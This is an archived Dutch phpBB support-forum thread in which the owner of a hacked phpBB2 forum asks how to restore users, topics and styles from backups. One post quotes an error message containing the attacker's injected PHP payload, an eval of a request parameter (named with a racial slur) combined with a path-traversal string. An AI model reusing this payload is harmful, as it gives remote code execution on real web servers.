na gehackt te zijn
Forumregels
Sinds 1 januari 2009 wordt phpBB2 niet meer ondersteund.
Onderstaande informatie is verouderd en dient uitsluitend als archief.
Sinds 1 januari 2009 wordt phpBB2 niet meer ondersteund.
Onderstaande informatie is verouderd en dient uitsluitend als archief.

-
ladanivabelgium
- Contacteer:
na gehackt te zijn
m'n forum is gehackt (eigen stomme schuld, ik had nog een ouwe phpBB2-versie) en nu zit ik in zak en as
tot nu toe geprobeerd:
- backup terugplaatsen= geen success
- forum weg en nieuw geinstalleerd en dan geprobeerd backup terug te plaatsen = geen success
- ik heb nu opnieuw een nieuw forum geinstalleerd, maar ik wil graag m'n ouwe bestanden terug. ik heb via ftp een backup gemaakt van de mappen van m'n ouwe forum. Kan ik daar wat mee? Welke mappen en bestanden moet ik dan overschrijven?
tot nu toe geprobeerd:
- backup terugplaatsen= geen success
- forum weg en nieuw geinstalleerd en dan geprobeerd backup terug te plaatsen = geen success
- ik heb nu opnieuw een nieuw forum geinstalleerd, maar ik wil graag m'n ouwe bestanden terug. ik heb via ftp een backup gemaakt van de mappen van m'n ouwe forum. Kan ik daar wat mee? Welke mappen en bestanden moet ik dan overschrijven?
-
ladanivabelgium
- Contacteer:
-
ladanivabelgium
- Contacteer:
maar dat is niet meer het probleem. Ik heb m'n hele forum verwijderd en een nieuw geinstalleerd. Alleen wil ik graag m'n ouwe bestanden, gebruikers, groepen en topics terug.phpBB : Critical Error
Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file
DEBUG MODE
Line : 326
File : /opt/www/broesj2/web/forum.ladanivabelgium.be/phpBB2/includes/functions.php
-
ladanivabelgium
- Contacteer:
-
ladanivabelgium
- Contacteer:
-
ladanivabelgium
- Contacteer:
ik heb een nieuw forum geinstalleerd en dan de tabellen van de oude database in de nieuwe gezet. Alleen de tabellen 'config', confirm', 'disallow' en prune niet, want dan werkt het forum niet.
Moet om m'n ouwe style terug te hebben één of andere pagine overschrijven door eentje van de oude database of moet ik de hele boel 'met de hand' doen?
Moet om m'n ouwe style terug te hebben één of andere pagine overschrijven door eentje van de oude database of moet ik de hele boel 'met de hand' doen?
-
ladanivabelgium
- Contacteer:
-
ladanivabelgium
- Contacteer:
-
ladanivabelgium
- Contacteer:
-
ladanivabelgium
- Contacteer: